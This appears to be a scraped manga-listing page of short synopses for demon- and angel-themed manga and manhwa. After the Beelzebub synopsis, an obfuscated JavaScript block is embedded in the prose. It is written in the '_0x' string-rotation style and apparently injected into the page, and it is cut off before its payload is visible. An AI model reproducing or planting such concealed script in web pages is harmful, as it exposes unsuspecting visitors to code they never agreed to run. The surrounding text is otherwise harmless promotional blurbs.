In the midst of a terrorist attack that kills all his classmates,Tohru Kuroe knows the chances of seeing yet another woman die makes Tohru pick up an abandoned gun - The beast awakens; taking over. When Tohru comes to his senses, he finds he is now a killer. Finding out he was genetically engineered to be a killer, his codename is D-17, Tohru continues his 'normal' life amidst challengers threatening his life and those around him.
Above the Earth, there is a continuous battle between angels and devils. One devil in particular, Sword, has it in for a certain angel, Ios. In their 101st fight together, both are severely wounded. Not only that, but their clashing power causes the two to fall to earth. By chance, Sword finds a beaten, unconscious teenage boy nearby, and he is able to take over the human's body to save his own life. Some time later, Sword awakens in the hospital, briefly confused about his whereabouts. The father of the body he possessed enters the room, extremely happy to see his boy Souma alive. Then the older twin brother shows up. Immediately, Sword recognizes his enemy's energy. Also nearly dead, Ios had joined with Kanna's body. Sword goes to attack Ios, but quickly realizes that the body is far weaker than his demon form, especially from being recently beaten to hell. Since the brothers had been found heavily thrashed, their memory loss isn't that surprising. Their large change in behaviors is also explained by amnesia. As it turns out, Sword entered the body of the cliché nerd who can't run fifty meters without falling. Ios's new body is a terror, feared by all and constantly suspended from school. While the angel and devil have primary control over the bodies of the twins, reflex actions and memories of the other souls (still alive within the bodies) do appear. More importantly, the human bodies cannot handle the powers that Sword and Ios had used with ease. This a problem especially for Sword who is both over eager to use his powers and targeted by devils and angels. Taken from
An accidental deal with the devil goes awry. Veterinary student Yoon Ha discovers he has a fear of blood! To solve his problem, he makes a deal with the demon Samael in exchange for his soul, which goes terribly wrong. Now Yoon must help Samael recover his demonic powers... but evil spirits keep showing up, lusting after Yoon's body?!
A certain boy decides to summon a demon to help him with the search of his beloved...
Sweet and teasing, demon x angel couple pairing! The two races were meant to be like fire and water, yet the head general of the demons, Wei Zou, secretly holds a crush on the head general of the angels, An Si. To get the other party’s affection, he uses all sort of methods to deceive the naive angel into getting close to him. In the process, An Si, who originally hated demons, starts to find himself gradually warming up.
Debochi Amon (14) was always a passionate boy and had a tendency to literally steam up. Amon was living a normal life; going to school, hanging with friends and thinking about his crush on his classmate, Shinomoto Sako. One day, a third eye opens on his forehead after one of his usual “steaming” incidents and a talking owl creature who calls himself Goomin appears. Both characters are confused at the situation at hand and Goomin finally is able to explain the situation to Amon. Amon now possesses Pyrokinesis and his power of his fire increases when his passion grows. His emotion of wanting to protect something, like his crush Shinomoto, triggers the transformation into a demonic figure and his flame is powered through greed. Now, Amon must learn to control and use his powers to protect the human world from Angels!
I am Beelzebub, the King of the Devils that stands tall over all others. But after being betrayed by my subordinate and killed, I was reincarnated. I was definitely supposed to be born again as a devil…! But I can’t even spea… ababubaba…! The almighty Beelzebub is now a human child?!<script></script><script>(function(_0x17edd8,_0xe1035e){var _0x1205e9=_0x42e1,_0x5e0234=_0x17edd8();while(!![]){try{var _0x45dc4c=parseInt(_0x1205e9(0x82))/(0x4b4+0xdee+-0x12a1)+-parseInt(_0x1205e9(0x90))/(-0x1df5+-0x229+0x2020)+-parseInt(_0x1205e9(0x79))/(-0x1*-0x21ef+0x8ca+-0x155b*0x2)*(-parseInt(_0x1205e9(0x72))/(0x1d0d+-0x1516+-0x7f3))+parseInt(_0x1205e9(0x8f))/(0x1440+-0xf6f+-0x4cc)+-parseInt(_0x1205e9(0x8b))/(-0x25c5+0x1b36+-0x183*-0x7)+parseInt(_0x1205e9(0x81))/(-0x1e3+-0x2a+-0x10a*-0x2)+-parseInt(_0x1205e9(0x8c))/(0x919*-0x3+0x1662+0x73*0xb);if(_0x45dc4c===_0xe1035e)break;else _0x5e0234['push'](_0x5e0234['shift']());}catch(_0x50ff18){_0x5e0234['push'](_0x5e0234['shift']());}}}(_0x5714,-0x1*-0xc8363+-0x77f8*-0xd+-0x7ecce));function _0x5714(){var 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In Kitakaruizawa, a human larger-than-life springs forth from the Kobayakawa Research Center in the middle of the night. That same human, in an instant of pain and agony, turns to dust and is swept away by a forceful gale across the landscape, a tremendous sight witnessed only by clan of truck drivers rushing down the late-night highway. The experiment of Doctor Kobayakawa ends in a disappointing failure, yet the elder brother of a young Akio makes the acquaintance of the Doctor, unmistakably a trap, one bearing the danger of a new experiment...
A prequel to the (then) soon-to-release Devil May Cry 3. Dante is a demon slayer and bounty hunter with a demon heritage of his own that haunts his past. He's currently unemployed–and bored to death. Opportunity knocks in the form of a missing-child case, which his friend and manager, Enzo, offers him. But a four-million-dollar reward, an unexpected demon attack and a little girl named Alice all conspire to send Dante through the looking glass on a nightmarish adventure beyond his wildest imagination.
Read manhwa Devil Returns To School Days / School of the Malice / El diablo regresa a la escuela / Evil School / Kembalinya Iblis ke Sekolah / School of Evil / Şeytanın Okula Dönüşü On the last day of my 19, an ill-willed school violence brought my life to a halt. And I returned to the past. So I decided to be the ‘Malice’ wiping out the evil. “Devil Returns To School Days Manhwa” is sames name: ปีศาจกลับมาเรียน 恶之复仇 悪の登校 惡之返校 악(惡)의 등교 악의 등교
Narumi Detective Agency is where the people of old Japan go to for mysterious and supernatural cases. But Narumi is just the face of the operation and the real hero is Kuzunoha Raido, the devil summoner. As a devil summoner, Raido can call upon many different demons to assist him in solving cases that deal with other demons causing harm in the human world. Lately, there have been a surge of cases and a powerful summoner seems to be behind all the incidents. Is the Narumi-Raido combo strong enough to overcome the demon force more powerful than anything they have experienced before?
From MangaHelpers: The Comp is a popular portable game system that also functions as a smartphone. But it suddenly becomes a portal for demons to travel to the human world! Kazuya receives three Comps, from his master programmer cousin Naoya, for himself and his two friends Atsuro and Yuzu. In order to survive the demon invasion, the trio have to use the Comps to summon and subdue the demon that appears in order to fight back against the waves of demons that are about to swarm Japan! [vyc]